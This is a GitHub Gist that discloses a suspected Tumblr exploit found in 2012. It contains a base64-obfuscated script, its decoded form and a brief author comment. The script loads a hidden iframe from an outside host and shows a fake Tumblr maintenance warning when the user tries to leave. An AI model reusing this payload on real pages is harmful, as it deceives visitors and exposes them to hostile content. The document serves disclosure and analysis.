Skip to content

Instantly share code, notes, and snippets.

@scottschiller
Created December 3, 2012 16:36
Show Gist options
  • Save scottschiller/4196142 to your computer and use it in GitHub Desktop.
Save scottschiller/4196142 to your computer and use it in GitHub Desktop.
Possible Tumblr exploit found in the wild, 12/03/2012
<div class="the-video hideflash"><script src="data:text/plain;base64,dmFyIGZyYW1la2lsbGVyID0gdHJ1ZTsNCg0Kd2luZG93Lm9ubG9hZCA9IGZ1bmN0aW9uKCl7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsYXBwZXInKS5zcmMgPSAiaHR0cDovL2kuaG9wZS55b3UuZ2V0LnN0cmFuZ2xlZC5uZXQiOw0KfQ0KDQp3aW5kb3cub25iZWZvcmV1bmxvYWQgPSBmdW5jdGlvbigpIHsgDQogIGlmKGZyYW1la2lsbGVyKSB7DQogICAgcmV0dXJuICJOb3RpY2U6IFR1bWJsciB3aWxsIGJlIHVuZGVyZ29pbmcgbWFpbnRlbmFuY2Ugb24gRGVjZW1iZXIgNHRoIDIwMTIgYXQgMDE6MDAgQU0gZm9yIHNldmVyYWwgaG91cnMuXG5cbiBXZSBjYW5ub3QgZm9yZWNhc3QgZm9yIGV4YWN0bHkgaG93IGxvbmcsIHVuZm9ydHVuYXRlbHkuXG4gV2UgYXBvbG9naXplIGZvciB0aGUgaW5jb252ZW5pZW5jZS5cblxuWW91IG1heSBub3cgZGlzbWlzcyB0aGlzIG1lc3NhZ2UgdmlhICdDYW5jZWwvU3RheSBvbiB0aGlzIHBhZ2UnLiBUaGFuayB5b3UuIjsgIC8vIGFueSBtZXNzYWdlIHRoYXQgaGVscHMgdXNlciB0byBtYWtlIGRlY2lzaW9uDQogIH0NCn07"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div>
Decoded:
/*
var framekiller = true;
window.onload = function(){
document.getElementById('lapper').src = "http://i.hope.you.get.strangled.net";
}
window.onbeforeunload = function() {
if(framekiller) {
return "Notice: Tumblr will be undergoing maintenance on December 4th 2012 at 01:00 AM for several hours.\n\n We cannot forecast for exactly how long, unfortunately.\n We apologize for the inconvenience.\n\nYou may now dismiss this message via 'Cancel/Stay on this page'. Thank you."; // any message that helps user to make decision
}
};
*/
-->
@scottschiller
Copy link
Author

The iFrame request appears to return a 301, and it's unclear to me exactly how that causes the onbeforeunload notice in the parent window. I only spent a few minutes digging. :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment